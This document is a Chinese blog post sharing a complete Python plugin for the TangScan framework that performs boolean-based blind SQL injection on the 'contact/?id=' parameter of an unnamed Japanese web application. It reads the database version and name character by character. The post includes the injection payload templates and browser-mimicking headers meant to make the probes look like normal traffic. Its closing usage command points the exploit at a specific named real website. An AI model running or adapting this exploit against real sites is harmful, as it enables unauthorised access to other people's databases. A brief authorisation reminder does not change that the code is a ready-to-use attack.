TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import string
import time
from thirdparty import requests
from modules.exploit import TSExploit
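class TangScan(TSExploit):
    """Boolean-based blind SQL injection plugin for ``<target>/contact/?id=``.

    ``verify`` proves the injection by reading ``version()`` one character at
    a time and checking that the result looks like a database version;
    ``exploit`` reads ``database()`` the same way.  Both are driven by a page
    marker that the vulnerable application only renders when the injected
    ``!=`` condition is false, i.e. when the guessed length or character is
    the right one.

    Written for the Python 2 TangScan framework (``TSExploit``); the code
    below deliberately sticks to syntax that also runs on Python 3.
    """

    # Fragment of the response that is present only when the injected
    # condition is false (guess correct).  Specific to the target application.
    MARKER = "name=\"\" method"
    # Pause between requests (seconds): crude rate limiting towards the target.
    REQUEST_DELAY = 0.3
    # Per-request timeout in seconds.
    REQUEST_TIMEOUT = 15
    # Written for a position where no candidate matched, so that later
    # characters are not shifted left and an incomplete value stays visible
    # (the original code silently dropped such positions).
    UNKNOWN_CHAR = "?"
    # Candidates tried at each position, most likely first.  Uppercase and
    # '+' are included because banners such as "10.3.27-MariaDB-0+deb10u1"
    # contain them; a lowercase-only set would silently lose those characters.
    CHARSET = (list(string.digits) + ['.', '-', '_', '@', '+']
               + list(string.ascii_lowercase) + list(string.ascii_uppercase))
    # Condition that is false exactly when the expression has the given length.
    LENGTH_TEMPLATE = "1' AND (length(%s)-%s)!=0 AND 'sbsb'='sbsb"
    # Condition that is false exactly when the character at the given 1-based
    # position has the given ordinal (ORD() makes the comparison case-exact).
    CHAR_TEMPLATE = ("1' AND ORD(MID((IFNULL(CAST(%s AS CHAR),0x20)),%s,1))!=%s"
                     " AND 'sbsb'='sbsb")
    # Browser-like headers so the probes look like ordinary page views.
    HEADERS = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate"
    }

    def __init__(self):
        # Name the class explicitly: ``super(self.__class__, self)`` recurses
        # forever as soon as this plugin is subclassed.
        super(TangScan, self).__init__()
        self.info = {
            "name": "Jp SQL injection",
            "product": "",
            "product_version": "",
            "desc": """
日本某程序SQL漏洞检测插件
""",
            "license": self.license.TS,
            "author": ["虾米 https://woj.app"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"},
            ],
            "type": self.type.injection,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {
            },
            "description": "",
            "error": ""
        })

    def _inject_url(self):
        """Return the injectable URL prefix, ``<target>/contact/?id=``."""
        return "{domain}/contact/?id=".format(domain=self.option.url)

    def _guess_is_correct(self, payload):
        """Send one injected request and read the boolean answer off the page.

        Returns ``True`` when MARKER is present (the guess in *payload* is
        correct), ``False`` when it is absent, and ``None`` when the request
        failed or came back with a non-200 status.  In the ``None`` case
        ``self.result`` has already been updated (``error`` on an exception,
        ``status = False`` on a bad status) and the caller must stop.
        """
        exps_url = self._inject_url() + payload
        try:
            print(exps_url)
            # verify=False: the target is a third-party host that may use a
            # self-signed certificate; no trust decision is made on its cert.
            response = requests.get(exps_url, timeout=self.REQUEST_TIMEOUT,
                                    headers=self.HEADERS, verify=False)
            time.sleep(self.REQUEST_DELAY)  # rate limit towards the target
        except Exception as e:
            self.result.error = str(e)
            return None
        if response.status_code != 200:
            # Anything but 200 (WAF block page, 5xx) is not a boolean answer;
            # treat the target as not confirmed rather than guessing.
            self.result.status = False
            return None
        body = response.content
        marker = self.MARKER
        # On Python 3 ``content`` is bytes while MARKER is str; on Python 2
        # both are ``str`` and this branch is skipped.
        if isinstance(body, bytes) and not isinstance(marker, bytes):
            marker = marker.encode("utf-8")
        return body.find(marker) != -1

    def _blind_extract(self, expression, max_length):
        """Read the value of SQL *expression* one character at a time.

        The length is probed first (1..*max_length* inclusive), then every
        position is guessed from CHARSET.  Returns the extracted string,
        ``""`` when no length matched, or ``None`` when a request failed
        (``self.result`` is then already updated).  A position where no
        candidate matched is reported as UNKNOWN_CHAR.
        """
        length = 0
        for candidate in range(1, max_length + 1):
            answer = self._guess_is_correct(
                self.LENGTH_TEMPLATE % (expression, candidate))
            if answer is None:
                return None
            if answer:
                length = candidate
                break
        if length == 0:
            return ""
        chars = []
        for position in range(1, length + 1):
            found = self.UNKNOWN_CHAR
            for ch in self.CHARSET:
                answer = self._guess_is_correct(
                    self.CHAR_TEMPLATE % (expression, position, ord(ch)))
                if answer is None:
                    return None
                if answer:
                    found = ch
                    break
            chars.append(found)
        return "".join(chars)

    @staticmethod
    def _looks_like_version(text):
        """Return True when *text* contains ``<digit>.<digit>`` somewhere.

        False-positive filter on the extracted ``version()``.  Unlike a fixed
        ``"5."`` check it also accepts MySQL 8.x and MariaDB 10.x banners.
        """
        for i in range(1, len(text) - 1):
            if text[i] == "." and text[i - 1].isdigit() and text[i + 1].isdigit():
                return True
        return False

    def verify(self):
        """Confirm the injection by extracting ``version()``.

        Sets ``self.result.status`` to True only when the extracted value looks
        like a database version; a request failure leaves ``status`` as set by
        ``_guess_is_correct``.  Up to 64 characters are probed, which covers
        long distro banners like ``5.7.33-0ubuntu0.18.04.1-log``.
        """
        version = self._blind_extract("version()", 64)
        if version is None:
            return
        if not self._looks_like_version(version):
            self.result.status = False
            return
        self.result.status = True
        self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format(
            url=self.option.url,
            db_user=version
        )

    def exploit(self):
        """Extract the current database name via ``database()``.

        No plausibility check is applied to the value; a ``?`` in the result
        marks a position where no candidate character matched.  An empty
        result (no length matched) is reported as ``status = False``.
        """
        db_name = self._blind_extract("database()", 100)
        if db_name is None:
            return
        if not db_name:
            self.result.status = False
            return
        self.result.status = True
        self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format(
            url=self.option.url,
            db_user=db_name
        )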
if __name__ == "__main__":
    # Allow running the plugin standalone through the framework's CLI runner.
    from modules.main import main

    main(TangScan())
使用命令（请先取得目标授权再运行；`--mode exploit` 对应上面的 exploit()，读出当前数据库名）: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan